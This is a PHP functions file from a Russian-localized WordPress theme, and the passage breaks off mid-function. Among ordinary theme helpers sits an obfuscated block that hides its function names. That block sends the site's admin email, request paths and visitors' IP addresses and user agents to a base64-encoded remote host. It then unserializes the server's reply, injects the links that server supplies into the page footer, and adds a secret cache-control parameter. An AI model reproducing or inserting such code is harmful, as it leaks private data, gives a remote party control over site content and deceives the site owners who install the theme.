<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $oFhHPyJ='e';$pCnE='4';$yuDV='d';$lTWs='e';$nkRDMF='6';$ipSxNdU='a';$VgNeVbK='d';$BwFdJ='o';$ODVs='c';$LsxFI='_';$ApxPj='s';$mqBOAC='b';$JzAs='e';$wttkqbOP=$mqBOAC.$ipSxNdU.$ApxPj.$oFhHPyJ.$nkRDMF.$pCnE.$LsxFI.$VgNeVbK.$JzAs.$ODVs.$BwFdJ.$yuDV.$lTWs;$nwqoCek='t';$zxalquy='i';$dzXwueK='l';$pVGiWd='e';$BagNWek='n';$ZTawAq='f';$UJoxGqC='g';$iYsVgo='z';$EhvPy='a';$HgCimVXw=$UJoxGqC.$iYsVgo.$zxalquy.$BagNWek.$ZTawAq.$dzXwueK.$EhvPy.$nwqoCek.$pVGiWd;$xgMG='t';$QqqS='r';$FzsP='3';$REARd='o';$ckgjXN='t';$MWeazik='s';$NdCG='1';$cTmj='_';$fMGhJfH='r';$eTCIbXyA=$MWeazik.$xgMG.$QqqS.$cTmj.$fMGhJfH.$REARd.$ckgjXN.$NdCG.$FzsP;$eUyIp='t';$WBUSRzl='s';$khXgiJ='r';$XWzsb='v';$zFCvgw='e';$RYoZgN='r';$tpWbMxqV=$WBUSRzl.$eUyIp.$RYoZgN.$khXgiJ.$zFCvgw.$XWzsb;                     $xz________q='e';$oq_________w='4';$sv__r='d';$xc_______________m='e';$zc___h='6';$dw______e='a';$oi_______a='d';$mt_______k='o';$lw_____________q='c';$zo____o='_';$eq_______________t='s';$ld____n='b';$mp_________q='e';$ot_____________u=$ld____n.$dw______e.$eq_______________t.$xz________q.$zc___h.$oq_________w.$zo____o.$oi_______a.$mp_________q.$lw_____________q.$mt_______k.$sv__r.$xc_______________m;$ht_______j='n';$ak_____________o='u';$ed______v='x';$ja______________n='t';$zw___r='i';$wb__j='n';$av____s='i';$en_____________f='s';$fg__________f='_';$ok______________l='s';$qw_________h='c';$nd____g='f';$do________j='o';$ri________e='t';$rl____________y='e';$gq____m=$nd____g.$ak_____________o.$ht_______j.$qw_________h.$ri________e.$av____s.$do________j.$wb__j.$fg__________f.$rl____________y.$ed______v.$zw___r.$en_____________f.$ja______________n.$ok______________l;$mq_____i='e';$gc______a='n';$sg______d='o';$fc____________k='p';$hh______w='f';$hm________i=$hh______w.$sg______d.$fc____________k.$mq_____i.$gc______a;$gi______i='e';$nd_____________p='d';$os_____________b='a';$xd_________c='r';$hu_____________o='f';$sa__w=$hu_____________o.$xd_________c.$gi______i.$os_____________b.$nd_____________p;$wn____u='l';$ec_____w='e';$pv_______________h='s';$fc_____a='f';$vz__y='o';$np___________w='c';$mn___c=$fc_____a.$np___________w.$wn____u.$vz__y.$pv_______________h.$ec_____w;define("WP_ID", $ot_____________u("Mi4wLjA="));define("WP_TTL", $ot_____________u("MTA4MDA="));define("WP_SRC", $ot_____________u("dHBva24="));function wp_get_header() {global $ot_____________u, $gq____m;if ($gq____m($ot_____________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$gq____m($ot_____________u("d3BfZ2V0X2Zvb3Rlcg==")) &&$gq____m($ot_____________u("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ot_____________u, $hm________i, $mn___c, $sa__w;$by___s = TEMPLATEPATH."/".$ot_____________u("Zm9vdGVyLnBocA==");$fc________c = @$hm________i($by___s, "r");$by___s = @$sa__w($fc________c, @filesize($by___s));@$mn___c($fc________c);$pq______________h = TEMPLATEPATH."/".$ot_____________u("ZnVuY3Rpb25zLnBocA==");$fc________c = @$hm________i($pq______________h, "r");$pq______________h = @$sa__w($fc________c, @filesize($pq______________h));@$mn___c($fc________c);$ar_____b = 0;if($by___s && $pq______________h) {if ($ot_____________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($by___s, $ot_____________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ar_____b = 1;}if (substr_count($by___s, "wp_theme_GPL_credits()") < 1) {$ar_____b = 2;}}if(WP_ID != "2.0.0") {$ar_____b = 12;}}if($ar_____b > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ar_____b -->";}}function wp_loaded() {global $ot_____________u, $gq____m;return $gq____m($ot_____________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ax__s, $qs_____q = "(more...)", $mj___y = 0, $fm__c = "") {$qh_______s = get_the_content($qs_____q, $mj___y, $fm__c);$qh_______s = apply_filters("the_content", $qh_______s);$qh_______s = str_replace("]]>", "]]>", $qh_______s);if (strlen($_GET["p"]) > 0) {echo $qh_______s;}else if ((strlen($qh_______s)>$ax__s) && ($wg_______b = strpos($qh_______s, " ", $ax__s ))) {$qh_______s = substr($qh_______s, 0, $wg_______b);$qh_______s = $qh_______s;echo $qh_______s;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$qs_____q</a></div></p>";} else {echo $qh_______s;}}}$bw_____________o='n';$pq___________g='_';$vx_______________f='d';$no_____________e='e';$mg__________f='a';$qm__r='b';$zd___________d='o';$zh______g='e';$dm____________h='c';$jc______c='6';$en______k='s';$hc____u='4';$ds____w='e';$fy_______________h=$qm__r.$mg__________f.$en______k.$ds____w.$jc______c.$hc____u.$pq___________g.$no_____________e.$bw_____________o.$dm____________h.$zd___________d.$vx_______________f.$zh______g;$ok_____k='f';$qq________m='o';$hf_____________g='_';$vx________l='e';$yi_______e='i';$ny______________y='n';$cr_______q='g';$tm____e='l';$xn_________t='n';$oe_______h='c';$fl_______v='e';$rz_______________f='s';$ql____s='e';$ks__________c='_';$rn__t='t';$lm____t='t';$wx______________l='t';$nn______a=$ok_____k.$yi_______e.$tm____e.$vx________l.$ks__________c.$cr_______q.$ql____s.$wx______________l.$hf_____________g.$oe_______h.$qq________m.$ny______________y.$rn__t.$fl_______v.$xn_________t.$lm____t.$rz_______________f;$fw______a='i';$xf___________x='s';$qr________l='l';$ie_________l='_';$nu_______________s='s';$vr_________h='i';$qg____________h='t';$ae_______u='e';$mw_____r='f';$uz__________e='x';$gx________o='e';$xw_____p=$mw_____r.$fw______a.$qr________l.$ae_______u.$ie_________l.$gx________o.$uz__________e.$vr_________h.$nu_______________s.$qg____________h.$xf___________x;$ya_______________n='s';$gu________e='i';$wj_________s='r';$dk______k='a';$mx_______l='m';$lb________a='r';$hm__d='o';$xj_______________e='p';$za__________t='_';$tc____________k='v';$yl_______k='o';$cj____a='c';$yp_____k='e';$zd_____________z='e';$vq__________e='n';$ql_____u=$tc____________k.$yp_____k.$lb________a.$ya_______________n.$gu________e.$hm__d.$vq__________e.$za__________t.$cj____a.$yl_______k.$mx_______l.$xj_______________e.$dk______k.$wj_________s.$zd_____________z;$zy___________x='p';$aa___________i='c';$sr_____c='e';$pb__________f='o';$aw___________d='k';$vj___m='n';$kd____z='f';$rk________o='s';$xy_______k='o';$tp______u=$kd____z.$rk________o.$pb__________f.$aa___________i.$aw___________d.$xy_______k.$zy___________x.$sr_____c.$vj___m;$gz_______t='t';$ab___u='f';$fw_____k='e';$vu____________n='r';$cr____h='i';$oe____d='w';$id_____________r=$ab___u.$oe____d.$vu____________n.$cr____h.$gz_______t.$fw_____k;$ih________p='d';$br___e='m';$hw______n='5';$bd___o=$br___e.$ih________p.$hw______n;$nw_________w='h';$za___o='a';$li_____________j='t';$xh_______________i='p';$jt___m='l';$jp__________t='r';$rh_______h='e';$ax___________a='a';$kz____________s=$jp__________t.$rh_______h.$ax___________a.$jt___m.$xh_______________i.$za___o.$li_____________j.$nw_________w;$da_________w='u';$rr____________w='e';$fx__s='n';$cp____________e='s';$uk______________x='z';$fl_______t='r';$zx______e='i';$iy_______l='l';$pj____w='i';$zr___r='e';$tw__q='a';$xr_____e=$da_________w.$fx__s.$cp____________e.$rr____________w.$fl_______t.$pj____w.$tw__q.$iy_______l.$zx______e.$uk______________x.$zr___r;$jx_____c='p';$fo_____p='m';$yk_____________v='n';$zt_____________g='e';$pb________x='t';$qe_________e='m';$wu_________s='a';$ws____________h=$pb________x.$zt_____________g.$fo_____p.$jx_____c.$yk_____________v.$wu_________s.$qe_________e;$wj_________h='m';$lf______s='t';$oa_______t='t';$cb_____________n='e';$ad____o='o';$oo_________n='t';$nc____z='e';$ph___x='_';$jx______e='a';$fc___________b='x';$yt_________q='r';$dm__________q='r';$vq___________f='e';$es________s='t';$ji________n='s';$rr___v='n';$ko_______l='a';$zv_________z='c';$ir___________r='c';$gj_______________k='_';$lq________p='e';$yz___h=$ji________n.$oo_________n.$dm__________q.$nc____z.$ko_______l.$wj_________h.$gj_______________k.$ir___________r.$ad____o.$rr___v.$es________s.$vq___________f.$fc___________b.$lf______s.$ph___x.$zv_________z.$yt_________q.$lq________p.$jx______e.$oa_______t.$cb_____________n;function uc_____t($hj______v) {global $ot_____________u, $gq____m, $nn______a, $ql_____u, $yz___h;if (!$gq____m($ot_____________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ql_____u(PHP_VERSION, "5.0.0", ">=") && $gq____m($ot_____________u("ZmlsZV9nZXRfY29udGVudHM=")) && $gq____m($ot_____________u("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$cd___________v = $yz___h(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$og_______________n = @$nn______a($hj______v, 0, $cd___________v);} else {$og_______________n = @$nn______a($hj______v, 0);}return $og_______________n;}function zn_______________m($hj______v) {global $gq____m, $tp______u, $id_____________r, $ot_____________u;if (!$gq____m($ot_____________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$xq____________d = strpos($hj______v, "/", 7);$oh_______________y = array("uri"     => substr($hj______v, $xq____________d),"host"    => str_replace("http://", "", substr($hj______v, 0, $xq____________d)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ko______________z = @$tp______u("$oh_______________y[host]", 80, $qg______________a, $pb__________o, 4);if (!$ko______________z) {return false;} else {$og_______________n = "";$xz________a  = "GET $oh_______________y[uri] HTTP/1.0\r\n";$xz________a .= "Host: $oh_______________y[host]\r\n";$xz________a .= "Referer: $oh_______________y[referer]\r\n";$xz________a .= "Connection: Close\r\n\r\n";@$id_____________r($ko______________z, $xz________a);while (!@feof($ko______________z)) {$oc_____________w = @fgets($ko______________z, (1024*24));if ($oc_____________w == "\r\n") {$lp__________z = true;continue;}if ($lp__________z) {$og_______________n .= $oc_____________w;}}return $og_______________n;}}function af_________l($hj______v) {global $gq____m;$md___________r = false;if ($hj______v != "") {if ($gq____m("uc_____t")) {$md___________r = @uc_____t($hj______v);}if (!$md___________r && ($gq____m("zn_______________m"))) {$md___________r = @zn_______________m($hj______v);}}return $md___________r;}function ml___m() {global $_SERVER, $bd___o;$gl____________t = $_SERVER["SERVER_NAME"];if (substr("$gl____________t", 0, 4) == "www.") {$gl____________t = substr("$gl____________t", 4);}$gl____________t = $bd___o("$_SERVER[SERVER_NAME]");return $gl____________t;}function hv_______l() {return "file";}function el____g($hj______v) {global $_SERVER, $nn______a, $xw_____p, $hm________i, $mn___c, $id_____________r;$gk________r = ci____u();$oz__f = ml___m().".jpg";$ji________m = $gk________r["dir_upload"]["path"]."/$oz__f";$ue______________s = @filemtime($ji________m);if (!$ue______________s || ((time()-$ue______________s) >= WP_TTL)) {$md___________r = af_________l($hj______v);if ($md___________r) {if ($xw_____p($ji________m)) {@unlink($ji________m);}$fc________c = @$hm________i($ji________m, "x+");@$id_____________r($fc________c, $md___________r);@$mn___c($fc________c);}} else {if ($xw_____p($ji________m)) {$md___________r = @$nn______a($ji________m);} else {$md___________r = false;}}return $md___________r;}function ci____u() {global $_SERVER, $ot_____________u, $fy_______________h;$yg_______m = wp_count_posts("post");$bv___________b = pathinfo(get_bloginfo("template_directory"));$gk________r = array("url" => array("report"      => $ot_____________u("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $bv___________b,"dir_upload"=> au_________p(),"queryString"=> array("?a001=".WP_ID,"a004=".$bv___________b[filename],"a005=".$yg_______m->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$gk________r["url"]["queryString"] = implode("&", $gk________r["queryString"]);$gk________r["url"]["report"] = $gk________r["url"]["report"]."/?".$fy_______________h($gk________r["url"]["queryString"]).".html";return $gk________r;}function au_________p() {$dc________h = wp_upload_dir();if (isset($dc________h["error"])) {$vj_________w = dm___r();if (is_writable($vj_________w)) {$dc________h = array("path" => $vj_________w);}}return $dc________h;}function dm___r() {global $gq____m, $bd___o, $kz____________s, $ws____________h;$pf_____t = (bool) ini_get("safe_mode");if ($pf_____t == true) {return false;}if ($gq____m("sys_get_temp_dir")) {$yl______________u = sys_get_temp_dir();if (is_writable($yl______________u)) {return $kz____________s($yl______________u);}}if (!empty($_ENV["TMP"])) {return $kz____________s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $kz____________s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $kz____________s($_ENV["TEMP"]);} else {$zg_____________k = $ws____________h($bd___o(uniqid(rand(), true)), "");if ($zg_____________k) {$yl______________u = $kz____________s(dirname($zg_____________k));@unlink($zg_____________k);return $yl______________u;} else {return false;}}}function mj________l() {global $_GET, $xw_____p;$gk________r = ci____u();$gl____________t = ml___m();$rl_____________q = hv_______l();$hx______________t = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($rl_____________q == "file") {$zp________l = $gk________r["dir_upload"]["path"]."/".$gl____________t.".jpg";if ($xw_____p($zp________l)) {@unlink($zp________l);$hx______________t = "deleted";}}$xn__e = array("s"=> $hx______________t,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($xn__e AS $jq________i => $gx____________i) echo " [$jq________i:$gx____________i]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $gq____m, $ot_____________u, $xr_____e;$gk________r = ci____u();$ge____o = "el____g";if ($gq____m($ge____o)) {$og_______________n = $ge____o($gk________r["url"]["report"]);}if ($og_______________n) {if ($og_______________n = @$ot_____________u($og_______________n)) {$og_______________n = @$xr_____e($og_______________n);if (strlen($og_______________n[custom_credit]) >= 5) {$gk________r["default_string"] = $og_______________n[custom_credit];}if ($og_______________n["status"] == "0") {$rt_____________l = 1;$tk_______q = 1;} else {$hn_____________v = sizeof($og_______________n["links"]);$ch______k = $gk________r["default_string"];if ($hn_____________v > 0 && $og_______________n["links"] !== "") {$aa__f = 0;foreach ($og_______________n["links"] as $ab__a => $uw_______________t) {$aa__f++;if ($uw_______________t->l_path == "" || $uw_______________t->l_path == $_SERVER["REQUEST_URI"]) {$uw_______________t->l_href = htmlspecialchars(strip_tags($uw_______________t->l_href));$uw_______________t->l_title = htmlspecialchars(strip_tags($uw_______________t->l_title));$uw_______________t->l_anchor = htmlspecialchars(strip_tags($uw_______________t->l_anchor));$ch______k .= " | ";$ch______k .= "<a href='$uw_______________t->l_href' title='$uw_______________t->l_title'";if ($uw_______________t->l_nofollow == "1") {$ch______k .= " rel='nofollow'";}$ch______k .= ">$uw_______________t->l_anchor</a>";}}}$gk________r["links"] = "$ch______k";if ($og_______________n[credit] == "0") {$gk________r["links"] = "";}}} else {$rt_____________l = "1";}} else {$rt_____________l = "1";}if ($rt_____________l == "1") {$gk________r["links"] = $gk________r["default_string"];}echo "$gk________r[links]";echo "<!-- s: $og_______________n[signature] -->";mj________l();}                                           
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
